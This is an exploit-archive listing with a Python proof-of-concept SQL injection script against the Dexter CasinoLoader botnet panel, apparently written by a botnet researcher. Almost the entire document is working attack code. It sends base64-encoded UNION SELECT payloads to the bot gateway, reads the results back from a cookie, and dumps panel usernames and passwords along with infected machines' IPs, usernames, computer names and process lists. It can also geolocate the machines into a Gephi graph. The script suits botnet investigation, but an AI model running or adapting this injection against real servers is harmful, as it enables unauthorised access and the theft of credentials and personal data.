Proof of concept SQL injection exploit for the panel in Dexter CasinoLoader. It exploits the gateway for bots to connect in, which sanitizes none of its input. This version of the exploit just dumps database data, and can create a GEXF file to make a graph in Gephi.
e23bf1f6bf9d448ec21c0e08084f86886e247080217d33e730242930b073b444# Exploit Title: Dexter (CasinoLoader) Panel SQLi
# Date: Feb, 13, 2014
# Exploit Author: Brian Wallace (@botnet_hunter)
# Version: CasinoLoader
# Tested on: Windows 7, Ubuntu, Debian
import pycurl
import urllib
import cStringIO
import base64
import argparse
import sys
import string
import pygeoip
version = "0.1-http_bots-PoC"
def PrintHelp():
global version
print "usage: dexter.PoC.py [-h] [action] [gateway url]"
print ""
print "Dexter CasinoLoader BAMF PoC v" + version
print "Exploiting CasinoLoader panels for information"
print "By Brian Wallace (@botnet_hunter)"
print ""
print "arguments:"
print " action Actions to be taken against the botnet (default: dump)"
print " dump - Print configuration information obtained from source file"
print " drop - Execute a command to make the bot scripts exit"
print " source Path to non-obfuscated source code for the target bot (default: stdin)"
print ""
print("GPS:")
print(" -m MaxMind Location Location of Maxmind database files (default .)")
print ""
print " -h, --help Print this message"
print ""
class DexterPanel:
def __init__(self, gateway_url):
self.gateway_url = gateway_url
@staticmethod
def _get_field(gateway, table, column, row):
buf = cStringIO.StringIO()
c = pycurl.Curl()
c.setopt(c.URL, gateway)
page = "' AND 1=2 UNION ALL SELECT 1," + column + ",3 FROM " + table + " LIMIT 1 OFFSET " + str(row) + " -- --"
params = urllib.urlencode({'val': 'AA==', 'page': base64.b64encode(page)})
c.setopt(c.POSTFIELDS, params)
c.setopt(c.HEADERFUNCTION, buf.write)
c.perform()
val = buf.getvalue()
cookie = None
for line in val.split('\n'):
line = line.strip()
if line.count('Set-Cookie:') > 0 and line.count("response") > 0:
cookie = line
cookie = cookie[cookie.find('=') + 1:]
cookie = urllib.unquote(cookie)
cookie = base64.b64decode(cookie)
cookie = cookie[1:]
cookie = cookie[:-2]
break
buf.close()
return cookie
def get_all_user_details(self):
count = 0
users = []
while True:
user = self._get_field(self.gateway_url, 'users', 'name', count)
if user is None or user == "":
break
password = self._get_field(self.gateway_url, 'users', 'password', count)
count += 1
users.append({'user': user, 'password': password})
return users
def get_all_bot_details(self):
count = 0
bots = []
while True:
user = self._get_field(self.gateway_url, 'bots', 'RemoteIP', count)
if user is None or user == "":
break
count += 1
bots.append({'RemoteIP': user,
'UID': self._get_field(self.gateway_url, 'bots', 'UID', count),
'Version': self._get_field(self.gateway_url, 'bots', 'Version', count),
'Username': self._get_field(self.gateway_url, 'bots', 'Username', count),
'Computername': self._get_field(self.gateway_url, 'bots', 'Computername', count),
'UserAgent': self._get_field(self.gateway_url, 'bots', 'UserAgent', count),
'OS': self._get_field(self.gateway_url, 'bots', 'OS', count),
'Architecture': self._get_field(self.gateway_url, 'bots', 'Architecture', count),
'Idle Time': self._get_field(self.gateway_url, 'bots', 'Idle Time', count),
'Process List': self._get_field(self.gateway_url, 'bots', 'Process List', count),
'LastVisit': self._get_field(self.gateway_url, 'bots', 'LastVisit', count),
'LastCommand': self._get_field(self.gateway_url, 'bots', 'LastCommand', count)})
return bots
if __name__ == "__main__":
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument('action', nargs='?', type=str, default="dump", help="Actions to be taken against pBots (default: dump)", choices=["dump", "graph"])
parser.add_argument('gateway', nargs='?', type=str, default=None, help="URL to Dexter bot gateway")
parser.add_argument('-m', metavar='maxmind', type=str, nargs='?', default='./GeoLiteCity.dat')
parser.add_argument('-h', '--help', default=False, required=False, action='store_true')
args = parser.parse_args()
if args.help or args.gateway is None:
PrintHelp()
sys.exit()
if args.action == "dump":
url = args.gateway
dex = DexterPanel(url)
print "User details: %s" % dex.get_all_user_details()
print "Bot details: %s" % dex.get_all_bot_details()
elif args.action == "graph":
url = args.gateway
dex = DexterPanel(url)
bots = dex.get_all_bot_details()
#load Maxmind
sys.stderr.write('Loading MaxMind Database\n')
gi = pygeoip.GeoIP(args.m)
nodes = {}
connections = []
nodes["C2"] = {"id": 0, "label": "C2", "mod": 0}
highestnode = 1
#loop through all bots
for bot in bots:
ip = bot["RemoteIP"]
geoip = gi.record_by_addr(ip)
node = {"id": highestnode, "label": ip, "host": ip, "mod": 1}
highestnode += 1
if geoip is not None:
node['lat'] = geoip["latitude"]
node['lng'] = geoip["longitude"]
nodes[ip] = node
connections.append([node['id'], 0])
print('<?xml version="1.0" encoding="UTF-8"?>')
print('<gexf xmlns="http://www.gexf.net/1.2draft" version="1.2">')
print(' <meta lastmodifieddate="2009-03-20">')
print((' <creator>' + "bwall" + '</creator>'))
print(' <description></description>')
print(' </meta>')
print(' <graph mode="static" defaultedgetype="directed">')
print(' <attributes class="node" mode="static">')
print(' <attribute id="modularity_class" title="Modularity Class" type="integer"></attribute>')
print(' <attribute id="lat" title="lat" type="double"></attribute>')
print(' <attribute id="lng" title="lng" type="double"></attribute>')
print(' </attributes>')
print(' <nodes>')
for name, node in list(nodes.items()):
if 'lat' in node:
print((' <node id="' + str(node['id']) + '" label="' +
node['label'] + '">'))
print(' <attvalues>')
print((' <attvalue for="modularity_class" value="' +
str(node['mod']) + '"></attvalue>'))
print(' <attvalue for="lat" value="' + str(node['lat']) + '"></attvalue>')
print(' <attvalue for="lng" value="' + str(node['lng']) + '"></attvalue>')
print(' </attvalues>')
print(' </node>')
else:
print((' <node id="' + str(node['id']) + '" label="' +
node['label'] + '">'))
print(' <attvalues>')
print((' <attvalue for="modularity_class" value="' +
str(node['mod']) + '"></attvalue>'))
print(' <attvalue for="lat" value="0"></attvalue>')
print(' <attvalue for="lng" value="0"></attvalue>')
print(' </attvalues>')
print(' </node>')
print(' </nodes>')
print(' <edges>')
count = 0
for node in connections:
print((' <edge id="' + str(count) + '" source="' + str(node[0]) +
'" target="' + str(node[1]) + '" />'))
count += 1
print(' </edges>')
print(' </graph>')
print('</gexf>')
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed